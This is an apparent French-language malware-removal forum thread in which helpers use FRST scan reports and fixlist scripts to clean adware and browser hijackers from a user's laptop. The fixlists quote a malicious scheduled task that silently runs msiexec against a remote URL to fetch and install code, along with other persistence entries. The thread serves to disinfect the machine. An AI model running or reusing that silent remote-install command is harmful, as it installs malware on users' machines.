123search ou luckysearch jolly wallet ou rightcoupon sur Chrome

[sepointes]

Bonjour à tous
depuis quelques temps mon pc portable est infecté par des malwares divers :
un faux navigateur chrome s'installe régulièrement avec des pages d'accueil style 123search ou luckysearch, idem avec firefox
sur mon vrai chrome j'ai des encarts publicitaire (jolly wallet ou rightcoupon) que je n'arrive pas à supprimer
je lance quasi quotidiennement un scan malwarebytes qui me trouve systématiquement des menaces que je supprime mais le lendemain j'en ai à nouveau malgré la présence d'un antivirus
je ne comprends pas d'ou viennent tous ces malwares car je n'installe pas des programmes régulièrement, c'est comme si un programme toujours installé sur mon ordi réinstalle régulièrement ces faux navigateurs et malwares
Merci d'avance pour votre aide

[Malekal_morte]

Salut,

La cause est en général une extension malicieuse sur Chrome.
Vérifie sinon :

Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).

Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
* FRST.txt
* Shortcut.
* Additionnal.txt

Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.

[sepointes]

Bonjour
merci beaucoup pour ta réponse
voici les 3 fichiers générés
http://pjjoint.malekal.com/files.php?id ... 15h8q14s12
http://pjjoint.malekal.com/files.php?id ... g9p6v10t11
http://pjjoint.malekal.com/files.php?id ... s9q12b6y12

[angelique]

Bonjour,

• Ouvre le bloc-notes : Menu Démarrer / Tous les programmes / Accessoires et Bloc-Notes. (ou exécuter➫notepad)
  Copie/colle dedans ce qui suit :
  
  
  
  

  Code : Tout sélectionner

  Task: {33B1B5F2-82D5-46B1-BD9F-D253C3D93F91} - System32\Tasks\Ckojot => msiexec.exe /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=SamsungXSSDX850XEVOXMX2X120GB_S24ANX0H805701R&v=2017223 /q <==== ATTENTION
  HKU\S-1-5-21-1777505504-1078684236-3119349050-1001\...\Run: [background_fault] => C:\Users\pierre\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) <===== ATTENTION
  ShellExecuteHooks: Pas de nom - {94DF68D0-F44A-11E6-BF8E-64006A5CFC23} - C:\Program Files (x86)\Ckozadomvesse\Pperghtnerqisy.dll -> Pas de fichier
  FF Extension: (Français Language Pack) - C:\Users\pierre\AppData\Roaming\Firefox\Firefox\Profiles\kcznsb20.default\Extensions\[email protected] [2017-05-04] [non signé]
  FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [Pas de fichier]
  FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [Pas de fichier]
  CHR StartupUrls: Default -> "hxxp://www.ourluckysites.com/?type=hp&ts=1493313312&z=06663e5ee701a146b86be21g4zdtbc5ccg7c8cagag&from=che0812&uid=SamsungXSSDX850XEVOXMX2X120GB_S24ANX0H805701R"
  HKU\S-1-5-21-1777505504-1078684236-3119349050-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Dayglad\Application\chrome.exe <==== ATTENTION
  S2 SNARE; C:\Users\pierre\AppData\Local\SNARE\Snare.dll [X] <==== ATTENTION
  2017-05-04 21:23 - 2017-05-04 21:23 - 00000000 ____D C:\Program Files (x86)\AlphaGo
  2017-05-03 18:49 - 2017-05-03 18:49 - 00000000 ____D C:\Users\Public\Documents\Google
  2017-05-03 18:49 - 2017-05-03 18:49 - 00000000 ____D C:\Program Files (x86)\IIS
  2017-05-03 18:48 - 2017-05-03 18:48 - 00000000 _____ C:\Windows\SysWOW64\1111111
  2017-05-03 18:47 - 2017-05-03 18:47 - 00000000 _____ C:\Windows\SysWOW64\44
  2017-04-29 16:40 - 2017-04-29 16:40 - 00000000 ____D C:\Program Files\Common Files\DESIGNER
  2017-04-28 19:12 - 2017-04-28 19:15 - 00000000 ____D C:\Alitkojck
  2017-04-27 19:55 - 2017-04-27 19:55 - 00000000 ____D C:\Users\pierre\AppData\Roaming\Google
  2017-04-27 18:32 - 2017-05-03 18:47 - 00000000 _____ C:\Windows\SysWOW64\11
  2017-04-27 18:32 - 2017-04-27 18:32 - 00000000 _____ C:\Windows\SysWOW64\33
  2017-04-26 18:40 - 2017-05-06 15:31 - 00000000 ____D C:\Users\pierre\AppData\Local\Kitty
  2017-04-26 18:40 - 2017-05-04 21:23 - 00000000 ____D C:\Program Files\MK
  2017-04-26 18:40 - 2017-05-03 18:47 - 00000000 ____D C:\Insist
  2017-04-26 18:40 - 2017-04-30 12:09 - 00000000 ____D C:\Users\pierre\AppData\Local\SNARE
  2017-04-26 18:40 - 2017-04-26 18:40 - 00000000 ____D C:\Windows\psgo
  C:\Users\pierre\AppData\Local\background_fault
  2017-03-03 14:51 - 2017-03-03 14:51 - 0079736 _____ (AppWork GmbH) C:\Users\pierre\AppData\Local\Temp\131330190953127825.exe
  2017-01-28 19:19 - 2015-01-28 16:53 - 6012640 _____ (Foxit Corporation) C:\Users\pierre\AppData\Local\Temp\FoxitUpdater.exe
  2017-03-10 19:58 - 2017-03-10 19:58 - 0040448 ____N () C:\Users\pierre\AppData\Local\Temp\proxy_vole8115154294220436090.dll
  2017-02-23 23:30 - 2017-02-23 23:30 - 1199825 _____ () C:\Users\pierre\AppData\Local\Temp\unins000.exe
  C:\Program Files (x86)\Dayglad
  EmptyTemp:
  
  

• Menu Fichier / Enregistrer-sous
  Place toi sur le bureau.
  Dans le champs en bas, nom du fichier mets : fixlist.txt
  Clic sur Enregistrer - cela va créer un fichier fixlist.txt sur le bureau.
• Ferme toutes les applications, y compris ton navigateur
• Double-clique sur FRST.exe
  Sous Vista, Windows 7, 8,10, etc.... il faut lancer le fichier par clic-droit ➫ Exécuter en tant qu'administrateur
  Sur le menu principal, clique une seule fois sur Corriger/Fix et patiente le temps de la correction
  
  
  Un redémarrage peut être nécessaire (pas obligatoire).
• L'outil va créer un rapport de correction Fixlog.txt. Poste ce rapport dans ta réponse avec ton commentaire si c'est mieux !

[sepointes]

Merci
je viens de faire la correction
voici le rapport

Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 08-05-2017
Exécuté par pierre (09-05-2017 22:22:49) Run:1
Exécuté depuis C:\Users\pierre\Desktop
Profils chargés: pierre (Profils disponibles: defaultuser0 & pierre)
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
Task: {33B1B5F2-82D5-46B1-BD9F-D253C3D93F91} - System32\Tasks\Ckojot => msiexec.exe /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=SamsungXSSDX850XEVOXMX2X120GB_S24ANX0H805701R&v=2017223 /q <==== ATTENTION
HKU\S-1-5-21-1777505504-1078684236-3119349050-1001\...\Run: [background_fault] => C:\Users\pierre\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) <===== ATTENTION
ShellExecuteHooks: Pas de nom - {94DF68D0-F44A-11E6-BF8E-64006A5CFC23} - C:\Program Files (x86)\Ckozadomvesse\Pperghtnerqisy.dll -> Pas de fichier
FF Extension: (Fran�ais Language Pack) - C:\Users\pierre\AppData\Roaming\Firefox\Firefox\Profiles\kcznsb20.default\Extensions\[email protected] [2017-05-04] [non sign�]
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [Pas de fichier]
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [Pas de fichier]
CHR StartupUrls: Default -> "hxxp://www.ourluckysites.com/?type=hp&ts=14933 ... X0H805701R"
HKU\S-1-5-21-1777505504-1078684236-3119349050-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Dayglad\Application\chrome.exe <==== ATTENTION
S2 SNARE; C:\Users\pierre\AppData\Local\SNARE\Snare.dll [X] <==== ATTENTION
2017-05-04 21:23 - 2017-05-04 21:23 - 00000000 ____D C:\Program Files (x86)\AlphaGo
2017-05-03 18:49 - 2017-05-03 18:49 - 00000000 ____D C:\Users\Public\Documents\Google
2017-05-03 18:49 - 2017-05-03 18:49 - 00000000 ____D C:\Program Files (x86)\IIS
2017-05-03 18:48 - 2017-05-03 18:48 - 00000000 _____ C:\Windows\SysWOW64\1111111
2017-05-03 18:47 - 2017-05-03 18:47 - 00000000 _____ C:\Windows\SysWOW64\44
2017-04-29 16:40 - 2017-04-29 16:40 - 00000000 ____D C:\Program Files\Common Files\DESIGNER
2017-04-28 19:12 - 2017-04-28 19:15 - 00000000 ____D C:\Alitkojck
2017-04-27 19:55 - 2017-04-27 19:55 - 00000000 ____D C:\Users\pierre\AppData\Roaming\Google
2017-04-27 18:32 - 2017-05-03 18:47 - 00000000 _____ C:\Windows\SysWOW64\11
2017-04-27 18:32 - 2017-04-27 18:32 - 00000000 _____ C:\Windows\SysWOW64\33
2017-04-26 18:40 - 2017-05-06 15:31 - 00000000 ____D C:\Users\pierre\AppData\Local\Kitty
2017-04-26 18:40 - 2017-05-04 21:23 - 00000000 ____D C:\Program Files\MK
2017-04-26 18:40 - 2017-05-03 18:47 - 00000000 ____D C:\Insist
2017-04-26 18:40 - 2017-04-30 12:09 - 00000000 ____D C:\Users\pierre\AppData\Local\SNARE
2017-04-26 18:40 - 2017-04-26 18:40 - 00000000 ____D C:\Windows\psgo
C:\Users\pierre\AppData\Local\background_fault
2017-03-03 14:51 - 2017-03-03 14:51 - 0079736 _____ (AppWork GmbH) C:\Users\pierre\AppData\Local\Temp\131330190953127825.exe
2017-01-28 19:19 - 2015-01-28 16:53 - 6012640 _____ (Foxit Corporation) C:\Users\pierre\AppData\Local\Temp\FoxitUpdater.exe
2017-03-10 19:58 - 2017-03-10 19:58 - 0040448 ____N () C:\Users\pierre\AppData\Local\Temp\proxy_vole8115154294220436090.dll
2017-02-23 23:30 - 2017-02-23 23:30 - 1199825 _____ () C:\Users\pierre\AppData\Local\Temp\unins000.exe
C:\Program Files (x86)\Dayglad
EmptyTemp:

*****************

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{33B1B5F2-82D5-46B1-BD9F-D253C3D93F91} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{33B1B5F2-82D5-46B1-BD9F-D253C3D93F91} => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\Ckojot => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Ckojot => clé supprimé(es) avec succès
HKU\S-1-5-21-1777505504-1078684236-3119349050-1001\Software\Microsoft\Windows\CurrentVersion\Run\\background_fault => valeur supprimé(es) avec succès
HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{94DF68D0-F44A-11E6-BF8E-64006A5CFC23} => valeur supprimé(es) avec succès
HKCR\CLSID\{94DF68D0-F44A-11E6-BF8E-64006A5CFC23} => clé non trouvé(e).
C:\Users\pierre\AppData\Roaming\Firefox\Firefox\Profiles\kcznsb20.default\Extensions\[email protected] => déplacé(es) avec succès
HKLM\Software\Wow6432Node\MozillaPlugins\@foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xdp => clé supprimé(es) avec succès
HKLM\Software\Wow6432Node\MozillaPlugins\@foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xfdf => clé supprimé(es) avec succès
Chrome StartupUrls => supprimé(es) avec succès
HKU\S-1-5-21-1777505504-1078684236-3119349050-1001\SOFTWARE\Clients\StartMenuInternet\ChromeHTML => clé supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\SNARE => clé supprimé(es) avec succès
SNARE => service supprimé(es) avec succès
C:\Program Files (x86)\AlphaGo => déplacé(es) avec succès
C:\Users\Public\Documents\Google => déplacé(es) avec succès
C:\Program Files (x86)\IIS => déplacé(es) avec succès
C:\Windows\SysWOW64\1111111 => déplacé(es) avec succès
C:\Windows\SysWOW64\44 => déplacé(es) avec succès
C:\Program Files\Common Files\DESIGNER => déplacé(es) avec succès
C:\Alitkojck => déplacé(es) avec succès
C:\Users\pierre\AppData\Roaming\Google => déplacé(es) avec succès
C:\Windows\SysWOW64\11 => déplacé(es) avec succès
C:\Windows\SysWOW64\33 => déplacé(es) avec succès
C:\Users\pierre\AppData\Local\Kitty => déplacé(es) avec succès
C:\Program Files\MK => déplacé(es) avec succès
C:\Insist => déplacé(es) avec succès
C:\Users\pierre\AppData\Local\SNARE => déplacé(es) avec succès
C:\Windows\psgo => déplacé(es) avec succès
C:\Users\pierre\AppData\Local\background_fault => déplacé(es) avec succès
C:\Users\pierre\AppData\Local\Temp\131330190953127825.exe => déplacé(es) avec succès
C:\Users\pierre\AppData\Local\Temp\FoxitUpdater.exe => déplacé(es) avec succès
C:\Users\pierre\AppData\Local\Temp\proxy_vole8115154294220436090.dll => déplacé(es) avec succès
C:\Users\pierre\AppData\Local\Temp\unins000.exe => déplacé(es) avec succès
"C:\Program Files (x86)\Dayglad" => non trouvé(e).

=========== EmptyTemp: ==========

BITS transfer queue => 294165 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 93925568 B
Java, Flash, Steam htmlcache => 283961842 B
Windows/system/drivers => 67860721 B
Edge => 16430551 B
Chrome => 580714498 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 6656 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 12 B
systemprofile32 => 117179384 B
LocalService => 49886 B
NetworkService => 3346 B
defaultuser0 => 128 B
pierre => 868459622 B

RecycleBin => 149308 B
EmptyTemp: => 1.9 GB données temporaires supprimées.

================================
Le système a dû redémarrer.

==== Fin de Fixlog 22:23:31 ====


en espérant que plus ca suffise

Merci encore pour votre aide et votre disponibilité
Heureusement que ce forum existe ;)))

[sepointes]

Par contre je viens de faire un scan malwareBytes pour vérifier qu'il ne restait plus rien et il me trouve encore 14 menaces
notamment des fichiers de type winsapp qui reviennent tout le temps alors que je les supprime régulierement

[Malekal_morte]

Côté 123search ou luckysearch jolly wallet ou rightcoupon sur Chrome ça donne quoi ?

Mets tout en quarantaine.
Refais un scan FRST et donne les rapports via pjjoint.

[sepointes]

Pour ca c'est bon )

voila les rapports pour le nouveau scan
http://pjjoint.malekal.com/files.php?i ... 14e12y6f14
http://pjjoint.malekal.com/files.php?id ... 8t8i12u6u6
http://pjjoint.malekal.com/files.php?i ... h11d12f9p9
Merci

[Malekal_morte]

Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :

Code : Tout sélectionner

CreateRestorePoint:
CloseProcesses:
2017-05-09 18:19 - 2017-05-09 22:24 - 00000000 ____D C:\ProgramData\BIT
2017-05-09 18:19 - 2017-05-09 18:19 - 00000000 ____D C:\Reaqapytegupy
2017-05-09 18:19 - 2017-05-09 18:19 - 00000000 ____D C:\Program Files (x86)\MIO
C:\Program Files (x86)\MIO
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:

Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparait, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.

[sepointes]

Bonjour
j'ai refait la correction et voila la log

Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 08-05-2017
Exécuté par pierre (10-05-2017 18:51:45) Run:2
Exécuté depuis C:\Users\pierre\Desktop
Profils chargés: pierre (Profils disponibles: defaultuser0 & pierre)
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
CreateRestorePoint:
CloseProcesses:
2017-05-09 18:19 - 2017-05-09 22:24 - 00000000 ____D C:\ProgramData\BIT
2017-05-09 18:19 - 2017-05-09 18:19 - 00000000 ____D C:\Reaqapytegupy
2017-05-09 18:19 - 2017-05-09 18:19 - 00000000 ____D C:\Program Files (x86)\MIO
C:\Program Files (x86)\MIO
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
*****************

Erreur: (0) Impossible de créer un point de restauration.
Processus fermé avec succès.
C:\ProgramData\BIT => déplacé(es) avec succès
C:\Reaqapytegupy => déplacé(es) avec succès
C:\Program Files (x86)\MIO => déplacé(es) avec succès
"C:\Program Files (x86)\MIO" => non trouvé(e).
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.

========= RemoveProxy: =========

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1777505504-1078684236-3119349050-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1777505504-1078684236-3119349050-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès


========= Fin de RemoveProxy: =========


=========== EmptyTemp: ==========

BITS transfer queue => 1960848 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 7374138 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 637450 B
Edge => 0 B
Chrome => 79133890 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 2474 B
NetworkService => 0 B
defaultuser0 => 0 B
pierre => 1320322 B

RecycleBin => 189059 B
EmptyTemp: => 86.4 MB données temporaires supprimées.

================================


Le système a dû redémarrer.

==== Fin de Fixlog 18:51:50 ====

[Malekal_morte]

Je pense que ça doit être bon, tu confirmes ?

[sepointes]

oui ca a l'air bon
vraiment merci beaucoup en tout cas

[angelique]

Tu peux supprimer le dossier C:\FRST =)

Termine par un nettoyage Malwarebytes Anti-Malware (MBAM ) version gratuite


Quelques conseils :

Pour ne plus te faire avoir.
A lire - Programmes parasites / PUPs : Dossier Adwares/PUPs : programmes indésirables et parasites
(Surtout active les détections LPIs pour détecter les programmes parasites et publicitaires)

[sepointes]

Bonjour
désolé de revenir encore vers vous mais je pensais que tout était parti et en allumant mon ordi et chrome aujourd'hui je me retrouve a nouveau avec cette m... de "jollywallet"
du coup j'ai lancé une analyse malwarebytes et j'ai encore deux menaces identifiées :
HKLM/SYSTEM/CURRENTCONTROLSET/SERVICES/VSNARE (clé de registre)
HKLM/SYSTEM/CURRENTCONTROLSET/SERVICES/EVENTLOG/APPLICATION/VSNARE (clé de registre)

pourtant après toutes les étapes que vous m'avez indiqué il n'y avait plus rien et je n'ai rien téléchargé depuis
c'est comme si un virus ou malware toujours installé sur mon ordi me réinstallais ces trucs a chaque démarrage
je ne sais plus quoi faire
Merci

[angelique]

Peux tu refaire 2 rapports frst.txt et addition.txt
Utilise le site http://pjjoint.malekal.com/ pour envoyer ton rapport, et poste le lien dans ta prochaine réponse pour analyse.